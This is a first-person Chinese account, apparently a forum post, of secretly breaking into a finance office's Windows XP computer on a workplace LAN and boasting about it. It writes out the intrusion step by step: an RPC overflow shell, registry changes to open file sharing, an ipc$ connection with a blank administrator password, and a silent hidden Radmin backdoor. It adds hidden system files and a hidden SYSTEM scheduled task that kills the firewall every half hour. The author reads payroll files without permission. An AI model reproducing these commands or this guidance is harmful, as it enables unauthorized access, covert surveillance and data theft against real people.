這是一次真實的入侵例項，

事情發生在2005年的九月的一天，我們單位被集團公司的另一個大單位兼併。被兼併的第二天，大單位的財務人員到了我們廠，對我們廠進行了全面的財務審查。雖然沒查出什麼問題，顯然這幫人是對我們不放心的，下午他們又開始拉區域網線到我們的辦公室，要和我們聯網，看來它們是想用電腦對我們的經營情況進行監視了。你們想監視我們，我還想監視你們呢！！我心裡想著，一定要想辦法控制你們的電腦。叫你們知道我的厲害。於是開工。。。
我先開啟命令提示符，用ping 命令去ping 它，Reply from 192.168.16.4: bytes=32 time<1ms TTL=128，說明對方沒有防火牆，這樣或許有可能入侵。下一步，我使用了X-SCAN 3.2對它進行了詳細掃描,對方電腦的作業系統是XP，大家知道XP系統是相當安全的，在一些

黑客論壇討論的關於入侵XP的話題也是比較多的，入侵這樣的系統方法只有兩種，一是採用釣魚的方法，這是一種被動的方式讓對方中木馬來控制它。第二種方法就是如果對方有比較嚴重的漏洞，如RPC溢位。這樣的話，用溢位程式溢位它，然後再上傳控制程式進行控制。掃描結果確實讓我高興了一陣,對方電腦有大量的漏洞,其中一個比較有名的就是衝擊波利用的RPC漏洞,這個漏洞相當出名了,03年的時候曾席捲全球。知道了它有這個漏洞，下一步就要找溢位程式，這讓我忙活了好一陣時間，因為有的溢位程式對這臺電腦好像無效。這些工具的名稱我都記不起來了，反正有好幾個。最後找到了一個溢位程式XP.EXE，這個程式終於溢位了那臺電腦。得到了個CMDSHELL。這算是一個小小的勝利吧。
得到了CMDSHELL，我該怎樣給它上傳控制程式呢？我想了一會兒，終於靈感來了，我和它在一個區域網，用共享上傳最方便了。於是開啟網路上的芳鄰，檢視工作組計算機，找到這臺電腦，雙擊，進不去，提示資訊我記不清了，據我分析可能是對方這臺電腦沒有執行網路安裝嚮導，因為是XP系統，所以要用共享傳輸檔案，必須要執行這個嚮導不可，執行這個嚮導作用就是配置一個本地安全策略，你可以開啟“控制面板—管理工具—本地安全策略”，展開“本地策略”—“使用者權利指派”。在右邊有一個安全策略—“拒絕從網路訪問這臺計算機”。我想對方的電腦中相應的這條策略裡，肯定設定有GUEST這個使用者的，這就是為什麼我打不開它的共享的原因，因為共享訪問預設是以這個GEUST使用者登入的，因為它的安全設定不允許GUEST從網路訪問，所以我才訪問不了它的共享。因為XP預設的共享模式是簡單檔案共享。這與WIN2000系統不同，如果是WIN2000系統，你在知道管理員密碼的情況下，可以用命令net use //IP/ipc$ "密碼" /user:使用者名稱 建立與對方的ipc$連線，隨之而來的就是copy 木馬程式 //ip/d$這樣的命令上傳木馬了。XP就不能這樣子了，你即使知道它的管理員密碼用上面的命令與不能建立ipc$連線。這就是為什麼XP比2000系統安全的地方所在。下面我要作的就是要修改XP的共享模式為2000的共享模式。方法如下：在溢位獲得的CMDSHELL下，鍵入命令：
      echo Windows Registry Editor Version 5.00 >c:/123.reg
      echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa] >>c:/123.reg
      echo. >>c:/123.reg
      echo "forceguest"=dword:00000000 >>c:/123.reg 
      regedit /e c:/123.reg
等打完這幾條命令後，對方XP的共享模式就已經與2000的相同了。我來解釋一下這幾條命令的含意，echo Windows Registry Editor Version 5.00 >c:/123.reg這條命令是將Windows Registry Editor Version 5.00這幾個字元儲存到c:/123.reg檔案裡。大家需要注意一下第一句的> 和後面幾句的>>這是有區別的，>字元是覆蓋式的，>>是追加式的，第三句的echo. >>c:/123.reg命令是追加一個空白行，這句挺重要，如果不加這句是不能成功的，你可以隨便開啟一個登錄檔檔案看一下，格式就是這樣的，第二行是空著的。這一點一定要注意。執行完前四條命令後就在對方C盤下生成一個123.reg檔案，內容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa]
"forceguest"=dword:00000000
第五條命令是將這個REG檔案匯入到登錄檔中。這樣執行完這五條命令後，我就可以像操作2000系統一樣去用ipc$控制了。下一步，上傳控制程式。我選擇的是RADMIN2.0的服務程式，有人問這個安裝需要到圖形介面下，我說不用這麼費事，在CMDSHELL下一樣可以安裝。安裝前我們需要先準備一下，首先生成一個REG檔案，檔名：aaa.reg 內容如下：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters]
"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服務端程式能夠隱藏通知欄裡的圖示，我們都知道正常安裝RADMIN服務端程式後，在通知欄裡是有一個小圖示的，我們要入侵人家，當然要把這個小圖示去掉，不然是會被發現的。接著生成一個BAT檔案，我命名為aaa.bat，內容如下：

r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server

這些命令是安裝命令，設定連線埠為：2233 密碼是：1 隱藏安裝介面的方式安裝 然後就是將aaa.reg匯入登錄檔，啟動r_server服務。

準備工作作好後，就要上傳檔案了，一共需上傳4個檔案，aaa.reg aaa.bat r_server.exe admdll.dll 後兩個檔案是RADMIN安裝目錄下的，在安裝了RADMIN2.0客戶端後，安裝目錄裡就有這兩個檔案。我先建立ipc$連線 net use //192.168.16.4/ipc$ "" /user:administrator 提示：命令成功完成。接著:
copy r_server //192.168.1.4/admin$/system32
copy aaa.bat //192.168.1.4/admin$/system32
copy aaa.reg //192.168.1.4/admin$/system32
copy admdll.dll //192.168.1.4/admin$/system32
然後再進入溢位得到的CMDSHELL下鍵入：
attrib +s +h +r c:/windows/system32/r_server.exe
attrib +s +h +r c:/windows/system32/admdll.exe
attrib +s +h +r c:/windows/system32/aaa.bat
attrib +s +h +r c:/windows/system32/aaa.reg
這些命令是將這4個檔案設定成系統隱藏只讀檔案，不容易被對方管理員發現。
下一步就是執行aaa.bat了，就這麼簡單，執行成功後，我用radmin2.0客戶端設定了一下連線引數，埠改成2233，連線成功，密碼是1，成功地看到了對方的螢幕。呵呵，成功了，從有入侵的想法到入侵成功進行控制，只用了短短的4天時間。

進入後看到對方電腦上正在玩QQ保皇遊戲，不過我也犯了個錯誤我給它新建了個管理使用者，原先是打算用於ipc$連線用的，可我上傳RADMIN控制後忘記刪掉了，我在溢位的CMDSHELL下不小心鍵入了命令EXIT，結果對方電腦出現了倒計時關機的介面，我也沒有及時處理掉，我當時要是用RADMIN的CMD功能，鍵入命令shutdown -A就可以取消這個倒計時關機的介面，可當時我也沒有及時處理，導致對方電腦重啟了，重啟後我估計對方管理員看到了我新建的使用者了，後來我用RADMIN遠端檢視時，也覺得這個新建使用者太招搖了，使用者名稱就是ip$ ,圖示是個大紅的花朵。
下午的時候我發現那臺電腦的管理員請了位高手來助陣了，因為我們這個區域網中的各臺電腦都通過我們辦公室裡的那臺電腦連線到網際網路上，所以，那位高手先到我們辦公室電腦上查看了一番沒有發現問題後，他將原先安裝的江民換成了卡巴了，我估計他認為攻擊是來自網際網路上，豈不知黑客就在他眼皮底下，嘿嘿。。。。那位高手又給被我控制了的電腦上安裝了卡巴，原先的防毒軟體是諾頓，對WINDOWS也進行了更新，可這些作法都晚了，因為我已經控制你了,再打補丁也無用了。經過那位高手一番檢查與修補後，我的後門依然存在著，看來那位高手水平也不怎麼樣。我給它開放的ipc$功能，他也沒發現。也許他只認為是一次簡單的病毒攻擊，而掉以輕心了，而不知他的一舉一動都在我的監視之下。哈哈。。。
接下來的工作對我來說就比較簡單了，給它開telnet伺服器，開“遠端桌面”這個我採用的是圖形的方式進行操作的，中午下班後我等這臺計算機管理員走後，用RADMIN登入進去進行了一些設定工作。後來也通過RADMIN的檔案管理功能翻看了這臺電腦上的檔案，有一些財務報表，工資表之類的東西，這些對我來看沒什麼大的吸引力。不過我看到了我們集團老總的工資，每月一萬多塊錢呢！！好黑啊。。。這麼多，我工資只有區區幾百塊，真是太不公平了，憤憤不平中。。。。
後來一次通過RADMIN操作對方的電腦時不小心被管理員發現了，我想對方的管理員也很感到意外，windows的補丁打上了，還裝了強悍的卡巴，還是搞不定黑客！！哈哈，因為卡巴不是殺RADMIN的。後來對方那個管理員啟用了局域網“本地連線”中的防火牆功能，這樣我無法連線它的電腦了。因為RADMIN是正向連線的，所以在對方開防火牆的情況下是無法使用的。有一次下午下班後我無意地ping 了一下這臺電腦的IP，居然有返回。說明對方防火牆關閉了，我馬上用RADMIN連線，居然成功。我暈。。。原來對方只開了防火牆，並沒有發現這個明顯的後門。我想開防火牆也是那位電腦高手給搞的，依那個管理員的水平是想不到這個辦法的。不過telnet伺服器給關閉了，3389遠端桌面也給關了，共享模式也被修改回了原先的樣子。看來那位高手也是發現了一些漏洞並補上了，但是那個後門，他卻沒有發現，這就給我創造了第二次入侵的機會。他有政策我有對策，他可以開防火牆，我可以給他關掉，有人問要是再被管理員開啟了防火牆，那豈不是沒得玩了。哈哈。。。我下面給出一個我自己研究出來的獨門密方，保證百病！哈哈。。。。
我的方法是建立一個隱藏的計劃任務。讓這個計劃任務每隔半個小時殺除一遍防火牆，這樣即使對方管理員開啟防火牆也起不了什麼作用。方法如下：先建一個批處理檔案abc.bat，放在c:/windows/system32目錄下,內容如下：
net stop sharedaccess
當然也可以附加點別的，比如說你想半小時殺除一遍天網防火牆，可以再加上下面的命令：

taskkill /IM rfw.exe /f
如果想使共享模式是高階共享模式，可以再加上下面的命令：

regedit /e c:/windows/system32/abc.reg
當然這需要事先上傳一個abc.reg到它的c:/windows/system32目錄下，內容如下：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa]
"forceguest"=dword:00000000
下面我說一下建立隱藏計劃任務的方法：
在對方電腦的CMDSHELL下鍵入命令：
schtasks /create /tn "常駐" /tr c:/windows/system32/abc.bat /sc minute /mo 30 /ru "system"
這樣就在對方電腦上建立了一個以SYSTEM許可權執行的計劃任務，這個計劃任務每隔30分鐘執行一次c:/windows/system32/abc.bat,功能嘛，就是根據abc.bat裡面的命令列決定了，可以說這個新發現是相當厲害的，利用的巧妙，功能可以相當強大。如果只有這樣還不能達到隱藏的要求，你開啟控制面板—任務計劃，仍然可以發現它的存在。好的，下面說說隱藏它的方法。還是進入CMDSHELL中。鍵入命令attrib +h c:/windows/tasks/常駐.job回車後，你再到控制面板的任務計劃中看一下是不是以前的任務消失了。這只是表面消失，實際是它還是存在的。你可以在CMDSHELL下鍵入命令：schtasks檢視。這樣不管對方管理員怎樣修改設定，每隔半小時就又會補修改回來。它想擺脫我的控制可說是難上加難了。哈哈。。。
下面是入侵總結，計算機系統的安全狀況是一個動態的概念，每時每刻都會不同。不是說你電腦上裝了防毒軟體，裝了防火牆軟體就可以高枕無憂了。電腦保安還要靠使用者的安全意識和水平的提高。